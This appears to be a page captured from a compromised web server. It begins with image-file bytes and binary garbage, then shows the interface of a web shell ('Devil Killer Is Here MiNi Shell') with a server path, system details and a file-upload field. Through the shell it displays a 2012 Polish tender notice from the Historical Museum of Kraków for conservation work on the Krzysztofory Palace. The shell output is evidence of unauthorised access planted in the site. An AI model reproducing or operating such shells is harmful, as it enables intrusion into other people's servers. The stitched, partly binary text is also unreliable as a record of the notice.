JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120531/120997-N-2012.html

<p class="kh_header"><b>Kraków: WYKONANIE ROBÓT BUDOWLANO-KONSTRUKCYJNYCH I KONSERWATORSKICH W BUDYNKU PAŁACU POD KRZYSZTOFORY - SKRZYDŁO ZACHODNIE (UL. SZCZEPAŃSKA 2) WRAZ Z PRZEBUDOWĄ FRAGMENTU DZIEDZIŃCA W RAMACH REALIZACJI INWESTYCJI -PRZEBUDOWA, NADBUDOWA I ROZBUDOWA NA CELE MUZEALNE ZESPOŁU OBIEKTÓW PAŁACU POD KRZYSZTOFORY WRAZ Z INSTALACJAMI I SIECIAMI NA DZ. NR 313 OBR. 1 ŚRÓDMIEŚCIE-</b><br>
<b>Numer ogłoszenia: 120997 - 2012; data zamieszczenia: 31.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Historyczne Miasta Krakowa , Rynek Główny 35, 31-011 Kraków, woj. małopolskie, tel. 012 422 32 64, faks 012 422 32 64.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE ROBÓT BUDOWLANO-KONSTRUKCYJNYCH I KONSERWATORSKICH W BUDYNKU PAŁACU POD KRZYSZTOFORY - SKRZYDŁO ZACHODNIE (UL. SZCZEPAŃSKA 2) WRAZ Z PRZEBUDOWĄ FRAGMENTU DZIEDZIŃCA W RAMACH REALIZACJI INWESTYCJI -PRZEBUDOWA, NADBUDOWA I ROZBUDOWA NA CELE MUZEALNE ZESPOŁU OBIEKTÓW PAŁACU POD KRZYSZTOFORY WRAZ Z INSTALACJAMI I SIECIAMI NA DZ. NR 313 OBR. 1 ŚRÓDMIEŚCIE-.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w niniejszym postępowaniu jest 
WYKONANIE ROBÓT BUDOWLANO-KONSTRUKCYJNYCH I KONSERWATORSKICH W BUDYNKU PAŁACU POD KRZYSZTOFORY - SKRZYDŁO ZACHODNIE (UL. SZCZEPAŃSKA 2) WRAZ Z PRZEBUDOWĄ FRAGMENTU DZIEDZIŃCA W RAMACH REALIZACJI INWESTYCJI -PRZEBUDOWA, NADBUDOWA I ROZBUDOWA NA CELE MUZEALNE ZESPOŁU OBIEKTÓW PAŁACU POD KRZYSZTOFORY WRAZ Z INSTALACJAMI I SIECIAMI NA DZ. NR 313 OBR. 1 ŚRÓDMIEŚCIE-

Opisu przedmiotu zamówienia (Załącznik nr 1 do SIWZ) składa się z:
1.	dokumentacji projektowej 
2.	specyfikacji technicznych wykonania i odbioru robót budowlanych,
3.	przedmiarów robót.  

Powyższe prace należy wykonać zgodnie z :

1.pozwoleniem na budowę nr 187/10 z dnia 01.02.2010 r. (Załącznik nr 7)
2. pozwoleniem konserwatorskim nr 741/09 z dnia 29.10.2009 r. (Załącznik nr 8)
3. pozwoleniem na budowę nr 1153/10 z dnia 11.06.2010 r. (Załącznik nr 9)
4. pozwoleniem konserwatorskim nr 128/10 z dnia 03.03.2010 r. (Załącznik nr 10).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.28.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający przewiduje obowiązek wniesienia wadium.

Zgodnie z dyspozycją art. 45 ustawy PZP, wadium należy wnieść najpóźniej przed upływem terminu składania ofert (patrz Rozdział 12 pkt 1 SIWZ)
Do ww dnia i godziny poniższa kwota powinna znaleźć się na rachunku bankowym Zamawiającego.

Zamawiający żąda wniesienia wadium w wysokości:

100.000,00 PLN
(słownie: sto tysięcy złotych 00-100)

Wadium może być wniesione w formie:
1)	Pieniądza - OBOWIĄZKOWO PRZELEWEM - na konto: 
Bank PEKAO S.A 		 62 1240 1431 1111 0010 1944 5624
	z dopiskiem -Wadium - nr sprawy ZP-271-17 - 12 Roboty budowlane- Pałac Krzysztofory - Skrzydło zachodnie-
Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uważa wadium, które w oznaczonym terminie (przed upływem terminu składania ofert) znajdzie się na koncie Zamawiającego - data uznania rachunku Zamawiającego,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).

Uwaga: 
Dokumenty, o których mowa w pkt 2, 3, 4, 5 muszą być złożone w pokoju nr 10 (księgowość - Kasa MHK) w siedzibie MHK, Rynek Główny 35, 31-011 Kraków, IIIp. - przed upływem terminu składania ofert.

Wadium wnoszone w formie gwarancji bankowej, gwarancji ubezpieczeniowej, poręczenia bankowego, poręczenia spółdzielczej kasy oszczędnościowo-kredytowej powinno zawierać następujące elementy:
1)	określenie terminu obowiązywania poręczenia lub gwarancji (okres związania ofertą - 30 dni licząc od upływu terminu składania ofert),
2)	określenie kwoty poręczenia lub gwarancji,
3)	wskazanie gwaranta poręczenia lub gwarancji,
4)	wskazanie beneficjenta poręczenia lub gwarancji,
5)	zapis, iż poręczyciel / gwarant zobowiązuje się bezwarunkowo tj. na pierwsze żądanie, do zapłaty pełnej kwoty zabezpieczenia na rzecz beneficjenta w terminie do 30 dni,
6)	nieodwołalność poręczenia lub gwarancji.

W treści dokumentów gwarantujących zobowiązania wadialne należy zapisać, 
iż -ZABEZPIECZENIE WADIUM DOTYCZY PRZETARGU NA WYKONANIE ROBÓT BUDOWLANO-KONSTRUKCYJNYCH I KONSERWATORSKICH W BUDYNKU PAŁACU POD KRZYSZTOFORY - SKRZYDŁO ZACHODNIE (UL. SZCZEPAŃSKA 2) WRAZ Z PRZEBUDOWĄ FRAGMENTU DZIEDZIŃCA W RAMACH REALIZACJI INWESTYCJI -PRZEBUDOWA, NADBUDOWA I ROZBUDOWA NA CELE MUZEALNE ZESPOŁU OBIEKTÓW PAŁACU POD KRZYSZTOFORY WRAZ Z INSTALACJAMI I SIECIAMI NA DZ. NR 313 OBR. 1 ŚRÓDMIEŚCIE-

W przypadku wnoszenia wadium w pieniądzu (przelewem), gdy do upływu terminu wnoszenia wadium nastąpi jedynie obciążenie rachunku bankowego Wykonawcy, 
a bank nie dokona przelewu środków na rachunek Zamawiającego, przyjmuje się, 
że wadium nie zostało wniesione w terminie.

W przypadku wniesienia wadium w formie gwarancji bankowej lub ubezpieczeniowej, gwarancja ta musi być bezwarunkowa i nieodwołalna, płatna na pierwsze wezwanie Zamawiającego oraz obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę wyszczególnione w art. 46 ust 4a i 5 ustawy. 
W przypadku poręczeń muszą one gwarantować płatność na pierwsze wezwanie Zamawiającego oraz obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę. W przypadku gdy w dokumentach gwarantujących zobowiązania wadialne nie będą spełnione wskazane powyżej wymogi, Zamawiający uzna to za nie wniesienie wadium i wykluczy Wykonawcę z postępowania, a ofertę odrzuci.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia. Wykonawca spełni warunek w sytuacji, kiedy wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 zamówienia w zakresie robót konstrukcyjno - budowlanych i konserwatorskich, o wartości brutto minimum 4.000.000,00 zł każde, na obiektach zabytkowych, w tym co najmniej jedno zamówienie w obiekcie wpisanym do rejestru zabytków obejmujące:
- izolację fundamentów kamiennych i kamienno-ceglanych wraz z iniekcją w wykopach głębokich
- podbicie ścian fundamentowych z zastosowaniem mikrofali i metodą tradycyjną 
- prowadzenie prac pod nadzorem archeologicznym i architektonicznym
- roboty konserwatorskie przy polichromiach, freskach, sztukaterii, kamieniu i sztucznym kamieniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie odpowiednimi osobami zdolnymi do wykonania zamówienia. Wykonawca spełni warunek w sytuacji, kiedy wykaże, że dysponuje zespołem w skład, którego wchodzą:  
-Kierownik budowy - posiadający uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie bez ograniczeń w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity: Dz. U. 2010, Nr 243, poz. 1623) oraz posiadający aktualne zaświadczenie o członkostwie we właściwej izbie samorządu zawodowego 
-Osoba prowadząca badania i pełniąca nadzór archeologiczny z tytułem magistra uzyskanym na studiach wyższych na kierunku archeologia
-Badacz architektury z tytułem magistra inżyniera architekta
-Kierownik prac konserwatorskich z tytułem magistra lub uprawnieniami w zakresie renowacji i restauracji malarstwa i rzeźby 

Wyżej wskazane osoby winny posiadać odpowiednie, niezbędne doświadczenie tj.:

-Kierownik budowy - winien posiadać co najmniej  10 lat doświadczenia wymagane do kierowania robotami budowlanymi przy wykonywaniu robót przy zabytkach nieruchomych, zgodnie z Rozporządzeniem Ministra Kultury z 27 lipca 2011 r. (Dz.U. z 2011 r. Nr 165, poz. 987) oraz winien wykazać, że w okresie ostatnich 5 lat  kierował co najmniej 2 robotami budowlanymi o wartości 2.000.000,00 zł brutto każda.     
-Osoba prowadząca badania i pełniąca nadzór archeologiczny - winien posiadać co najmniej 10 lat doświadczenia w prowadzeniu badań archeologicznych, z doświadczeniem w prowadzeniu badań na stanowiskach wczesnośredniowiecznych, średniowiecznych i nowożytnych zgodnie z Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków, badań oraz badań archeologicznych poszukiwań ukrytych i porzuconych zabytków ruchomych (Dz. U. 2011 roku, nr 165, poz. 987).

-Badacz architektury- winien posiadać co najmniej 10 lat doświadczenia w zakresie badań architektury, zgodnie z Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków, badań oraz badań archeologicznych poszukiwań ukrytych i porzuconych zabytków ruchomych (Dz. U. 2011 roku, nr 165, poz. 987).
-Kierownik prac konserwatorskich - winien posiadać co najmniej 10 lat doświadczenia w pracach w zakresie renowacji i restauracji malarstwa i rzeźby zgodnie z Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków, badań oraz badań archeologicznych poszukiwań ukrytych i porzuconych zabytków ruchomych (Dz. U. 2011 roku, nr 165, poz. 987).

Uwaga!
Uprawnienia budowlane (nazwy specjalności i ich zakresy) będą rozpatrywane zgodnie z przepisami regulującymi nadawanie uprawnień budowlanych w dacie ich nadania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacja ekonomiczna i finansowa. Wykonawca spełni warunek kiedy wykaże, że:- posiada środki finansowe lub zdolność kredytową w wysokości 2.000.000,00 zł brutto</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Podpisany i wypełniony Formularz ofertowy - według wzoru, zał. nr 2 do  nin. SIWZ,
2)	Pełnomocnictwo  do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej,
3)	Kosztorys ofertowy opracowany metodą szczegółowej kalkulacji według formuły pierwszej, zgodnie z -Polskim standardami kosztorysowania robót budowlanych-, wydawnictwo: Stowarzyszenie Kosztorysantów Budowlanych, Warszawa 2005.
4)	Program konserwatorski Kaplicy (pomieszczenie 2.16) bez zatwierdzenia u Wojewódzkiego Konserwatora Zabytków
5)	wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego - stosowny dokument należy dołączyć do oferty,
6)	jeśli wykonawcą jest spółka cywilna przedłożyć należy wyciąg
z umowy spółki oraz ewentualną uchwałę wszystkich wspólników 
w zakresie należytej reprezentacji (art. 866 k.c.). W przypadku, gdy dokumenty ofertowe podpisuje jeden ze wspólników spółki cywilnej, pozostali jej przedsiębiorcy muszą przedłożyć stosowne dla niego upoważnienie do reprezentowania w sprawie (wybór Wykonawcy będącego spółką cywilną, skutkuje podpisaniem umowy ze wszystkimi przedsiębiorcami prowadzącymi w tej formie i nazwie działalność gospodarczą).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wprowadzenie istotnych zmian treści umowy wymaga sporządzenia pod rygorem nieważności pisemnego aneksu z zastrzeżeniem art.144 ust.1 ustawy Prawo Zamówień Publicznych.
2.	Istotne zmiany treści umowy mogą wynikać z następujących okoliczności:
a)	zmian regulacji prawnych obowiązujących w dniu podpisania umowy (m.in. zmian stawki podatku VAT), wówczas za niezmienne uznaje się ceny jednostkowe netto, zgodnie z kosztorysem ofertowym, stanowiącym zał. nr 2 do nin. umowy.
b)	w sytuacji wyrażenia przez Zamawiającego zgody na przedłużenie terminu wykonania umowy na skutek zaistnienia następujących okoliczności:
-z powodu wystąpienia dodatkowych robót, niemożliwych do przewidzenia przed zawarciem umowy przez doświadczonego wykonawcę,
-z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można była przewidzieć 
z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
-z powodu działań osób trzecich uniemożliwiających wykonanie prac, które 
to działania nie są zawinione przez którąkolwiek ze stron,
-w przypadku zawieszenia przez Zamawiającego wykonania robót,
-w przypadku nieterminowego przekazania przez Zamawiającego frontu robót,
-w przypadku gdy Zmawiający wyrazi wole przesunięcia terminu wykonania umowy przez Wykonawcę w zakresie finansowanym z dotacji NFRZK 
i uzyska na to zgodę właściwego podmiotu.
c)	wystąpienia konieczności zmiany zakresu rzeczowo-finansowego Umowy w sytuacji zmiany technologii  prowadzenia prac, wynikającej ze stanu zachowania obiektu, ujawnionego w trakcie realizacji Umowy, który odbiega od stanu założonego 
w opisie  przedmiotu zamówienia,
d)	w sytuacji zmian przedmiotu zamówienia na skutek wystąpienia następujących okoliczności:
-z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa,
-z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego, z  zastrzeżeniem, że zmiana sposobu wykonania zamówienia nie może wykraczać poza określenie przedmiotu umowy, zawarte w opisie przedmiotu zamówienia,
-z powodu zaniechania lub uzasadnionej rezygnacji z wykonania danego zakresu prac, objętego przedmiotem zamówienia,
-z powodu wystąpienia prac zamiennych, o których mowa w art. 20 ust. 1 pkt 3 i pkt 4b) ustawy Prawo budowlane o wartości nieprzekraczającej wartości mieszczącej się w łącznej wartości Przedmiotu umowy..</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mhk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Historyczne Miasta Krakowa, Rynek Główny 35, 31 - 011 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2012 godzina 09:00, miejsce: Muzeum Historyczne Miasta Krakowa, Rynek Główny 35, 31 - 011 Kraków, Sekretariat - III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 15)	Informację o formalnościach, jakie powinny zostać dopełnione po wyborze oferty w celu zawarcia umowy w sprawie zamówienia publicznego.

1.	W zawiadomieniu o wyborze oferty najkorzystniejszej Zamawiający poinformuje Wykonawcę o terminie i miejscu zawarcia umowy.
